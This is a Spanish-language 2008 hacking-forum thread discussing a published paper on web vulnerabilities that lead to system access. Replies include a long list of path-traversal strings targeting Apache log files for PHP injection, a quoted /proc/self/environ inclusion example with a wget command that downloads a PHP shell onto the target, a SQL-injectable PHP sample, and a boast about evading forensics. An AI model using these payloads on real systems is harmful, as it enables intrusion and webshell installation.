Web vulnerabilities to gain access to the system

pepeluxx · 13 Octubre 2008, 10:35 AM

Buenas

Pues que acabo de mandar a milw0rm un paper sobre vulnerabilidades web que permiten acceso a sistema. Podeis verlo aqui:
http://www.milw0rm.com/papers/232

La traducción a español estará disponible en enye-sec en cuanto el perro de RaiSe la suba

berz3k · 13 Octubre 2008, 18:48 PM

Lei el paper pepeluxx, siento que algunas cosas se puede automatizar mas mediante algun tipo de fuzzer sin usar tanto "perl" para vulnerabilidades ya conocidas y tan "trilladas" como LFI, RFI , Blind, me gusta usar las tools de mandingo las conoceis ? ademas de uno que otro fuzzer que realmente vale la pena, tambien es posible mejorar algunos vectores que igual valdria la pena agregar a tu paper y/o mencionar.

Código [Seleccionar]


-----[ 2.2.1 - Injecting PHP code into apache logs

Seguramente te falto mencionar estos Vectores aunque no he ordenado algunos mas, donde tambien son interesantes.

Código [Seleccionar]



"../../../../../var/log/httpd/access_log",
"../../../../../var/log/httpd/error_log",
"../apache/logs/error.log",
"../apache/logs/access.log",
"../../apache/logs/error.log",
"../../apache/logs/access.log",
"../../../apache/logs/error.log",
"../../../apache/logs/access.log",
"../../../../apache/logs/error.log",
"../../../../apache/logs/access.log",
"../../../../../apache/logs/error.log",
"../../../../../apache/logs/access.log",
"../logs/error.log",
"../logs/access.log",
"../../logs/error.log",
"../../logs/access.log",
"../../../logs/error.log",
"../../../logs/access.log",
"../../../../logs/error.log",
"../../../../logs/access.log",
"../../../../../logs/error.log",
"../../../../../logs/access.log",
"../../../../../etc/httpd/logs/access_log",
"../../../../../etc/httpd/logs/access.log",
"../../../../../etc/httpd/logs/error_log",
"../../../../../etc/httpd/logs/error.log",
"../../.. /../../var/www/logs/access_log",
"../../../../../var/www/logs/access.log",
"../../../../../usr/local/apache/logs/access_log",
"../../../../../usr/local/apache/logs/access.log",
"../../../../../var/log/apache/access_log",
"../../../../../var/log/apache/access.log",
"../../../../../var/log/access_log",
"../../../../../var/www/logs/error_log",
"../../../../../var/www/logs/error.log",
"../../../../../usr/local/apache/logs/error_log",
"../../../../../usr/local/apache/logs/error.log",
"../../../../../var/log/apache/error_log",
"../../../../../var/log/apache/error.log",
"../../../../../var/log/access_log",
"../../../../../var/log/error_log"
);

Código [Seleccionar]


----[ 2.2.2 - Injecting PHP code into process table

Vaya interesante no le conocia, las referencias que agregas respecto a esta tecnica, se menciona algo como esto:

Código [Seleccionar]

url = 'http://www.g-brain.net/index.php?page=../../../proc/self/environ'
cmd = 'wget http://www.g-brain.net/fish.txt -O fish.php;rm wget-log'

Antes de realizarlo se tedria que conocer el verdaro PATH de donde es encuentra el proc, estoy en slackware y sunOs x86 cambia bastante, una lista de ello haria falta, que tambien no esta referenciado, pepeluxx tu paper me da la impresion de que basado en su gran mayoria en el mismo que haces referencia

http://www.g-brain.net/tutorials/local-file-inclusions.txt

Código [Seleccionar]


-----[ 2.2.3 - Injecting PHP code into an image

Mmm pepeluxx te haz leido el paper de codebreak de w4cking.com mmm me parece existe un video tambien, pero la moda es hacerlo funcionar ya no solo en .jpg , gif etc, es interesante usarlo en . swf y hasta en video .flv. mpeg :-) , bueno la idea me la dio sirdarckcat y quedo de lujo, los forenses no encuentran nada XDD

Hey pepeluxx te ha quedado de lujo, esperamos la version en Spanish que seria un poco mas entendible y original para la Spanish Race.... mantenos informado de la version sobre este mismo hilo.

-berz3k.

pepeluxx · 13 Octubre 2008, 18:56 PM

Cita de: berz3k en 13 Octubre 2008, 18:48 PM
Seguramente te falto mencionar estos Vectores aunque no he ordenado algunos mas, donde tambien son interesantes.

Código [Seleccionar] Expandir
"../../../../../var/log/httpd/access_log", "../../../../../var/log/httpd/error_log", "../apache/logs/error.log",

No se mo olvido ... si te fijas veras que si que lo menciono entre unas de las posibilidades, buscar entre los posibles paths, lo que pasa es que no puse todas las combinaciones ya que es algo bien conocido

Cita de: berz3k en 13 Octubre 2008, 18:48 PM
pepeluxx tu paper me da la impresion de que basado en su gran mayoria en el mismo que haces referencia

http://www.g-brain.net/tutorials/local-file-inclusions.txt

Ese apartado sí, por eso añado la referencia, para indicar donde me he basado ya que no es algo que haya descubierto yo. El caso es que no esta muy difundido y por eso lo volvi a poner

Cita de: berz3k en 13 Octubre 2008, 18:48 PM
Mmm pepeluxx te haz leido el paper de codebreak de w4cking.com mmm me parece existe un video tambien, pero la moda es hacerlo funcionar ya no solo en .jpg , gif etc, es interesante usarlo en . swf y hasta en video .flv. mpeg :-) , bueno la idea me la dio sirdarckcat y quedo de lujo, los forenses no encuentran nada XDD

No lo he leido pero voy a echarle un ojo

Cita de: berz3k en 13 Octubre 2008, 18:48 PM
Hey pepeluxx te ha quedado de lujo, esperamos la version en Spanish que seria un poco mas entendible y original para la Spanish Race.... mantenos informado de la version sobre este mismo hilo.

Gracias ... a ver si RaiSe lo sube, que esta un poco Zen ultimamente jejeje

Azielito · 13 Octubre 2008, 23:27 PM

desmienteme, creo que hay un error "de dedo" en el codigo...

Código (php) [Seleccionar]

<?php
      $iduser = $_GET['$id'];
      $link = mysql_connect("localhost", "mysql_user", "mysql_password");
      mysql_select_db("database", $link);

      $result = mysql_query("SELECT * FROM users WHERE id=$iduser", $link);
      $row = mysql_fetch_array($result);

      echo "User mail is:" . $row["mail"] . "\n";
?>

Código (php) [Seleccionar]

$iduser = $_GET['$id'];
deberia ir sin el "$" en $_GET['$id']
o sea

Código (php) [Seleccionar]

$iduser = $_GET['id'];

Esta muy interesante, me encontre que en los logs del server de desarrollo que tengo los logs los guarda en url_encode =) y descubri algunas cosillas mas y aprendi bastante jehehe.

Excelente paper

felicidades

pepeluxx · 14 Octubre 2008, 00:22 AM

Tienes razon, es un error de codigo

pepeluxx · 14 Octubre 2008, 17:17 PM

Ya esta la version spanish en nuestra web ... http://www.enye-sec.org/textos.html

Saludos

-sagitari- · 14 Octubre 2008, 22:17 PM

está bien vuestr web, felicidades!

berz3k · 15 Octubre 2008, 00:30 AM

Kool, me gusto mas la version en Español, suena y se lee mas original que la version en Ingles XD

-berz3k.

pepeluxx · 15 Octubre 2008, 00:40 AM

jeje mi ingles deja un poco que desear

Eazy · 15 Octubre 2008, 01:17 AM

JAJAJA buen paper eh.